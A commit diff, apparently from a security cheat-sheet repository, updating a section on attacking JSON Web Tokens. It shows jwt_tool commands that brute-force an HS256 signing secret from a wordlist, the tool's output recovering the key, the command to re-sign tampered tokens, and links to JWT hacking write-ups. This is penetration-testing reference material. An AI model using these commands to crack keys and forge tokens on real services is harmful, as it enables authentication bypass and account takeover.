parent
4ae6982f63
commit
99e4868447
|
@ -188,20 +188,23 @@ First, bruteforce the "secret" key used to compute the signature.
|
|||
|
||||
```powershell
|
||||
git clone https://github.com/ticarpi/jwt_tool
|
||||
python2.7 jwt_tool.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwicm9sZSI6InVzZXIiLCJpYXQiOjE1MTYyMzkwMjJ9.1rtMXfvHSjWuH6vXBCaLLJiBghzVrLJpAQ6Dl5qD4YI /tmp/wordlist
|
||||
python3 jwt_tool.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwicm9sZSI6InVzZXIiLCJpYXQiOjE1MTYyMzkwMjJ9.1rtMXfvHSjWuH6vXBCaLLJiBghzVrLJpAQ6Dl5qD4YI -d /tmp/wordlist -C
|
||||
|
||||
Token header values:
|
||||
[+] alg = HS256
|
||||
[+] typ = JWT
|
||||
\ \ \ \ \ \
|
||||
\__ | | \ |\__ __| \__ __| |
|
||||
| | \ | | | \ \ |
|
||||
| \ | | | __ \ __ \ |
|
||||
\ | _ | | | | | | | |
|
||||
| | / \ | | | | | | | |
|
||||
\ | / \ | | |\ |\ | |
|
||||
\______/ \__/ \__| \__| \__| \______/ \______/ \__|
|
||||
Version 2.2.2 \______| @ticarpi
|
||||
|
||||
Token payload values:
|
||||
[+] sub = 1234567890
|
||||
[+] role = user
|
||||
[+] iat = 1516239022
|
||||
Original JWT:
|
||||
|
||||
File loaded: /tmp/wordlist
|
||||
Testing 5 passwords...
|
||||
[+] secret is the CORRECT key!
|
||||
You can tamper/fuzz the token contents (-T/-I) and sign it using:
|
||||
python3 jwt_tool.py [options here] -S HS256 -p "secret"
|
||||
```
|
||||
|
||||
Then edit the field inside the JSON Web Token.
|
||||
|
@ -279,4 +282,4 @@ eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMj...Fh7HgQ:secret
|
|||
- [HACKING JSON WEB TOKENS, FROM ZERO TO HERO WITHOUT EFFORT - Thu Feb 09 2017 - @pdp](https://blog.websecurify.com/2017/02/hacking-json-web-tokens.html)
|
||||
- [Write up – JRR Token – LeHack 2019 - 07/07/2019 - LAPHAZE](http://rootinthemiddle.org/write-up-jrr-token-lehack-2019/)
|
||||
- [JWT Hacking 101 - TrustFoundry - Tyler Rosonke - December 8th, 2017](https://trustfoundry.net/jwt-hacking-101/)
|
||||
- [JSON Web Token Validation Bypass in Auth0 Authentication API - Ben Knight Senior Security Consultant - April 16, 2020](https://insomniasec.com/blog/auth0-jwt-validation-bypass)
|
||||
- [JSON Web Token Validation Bypass in Auth0 Authentication API - Ben Knight Senior Security Consultant - April 16, 2020](https://insomniasec.com/blog/auth0-jwt-validation-bypass)
|
||||
|
|
Loading…
Reference in New Issue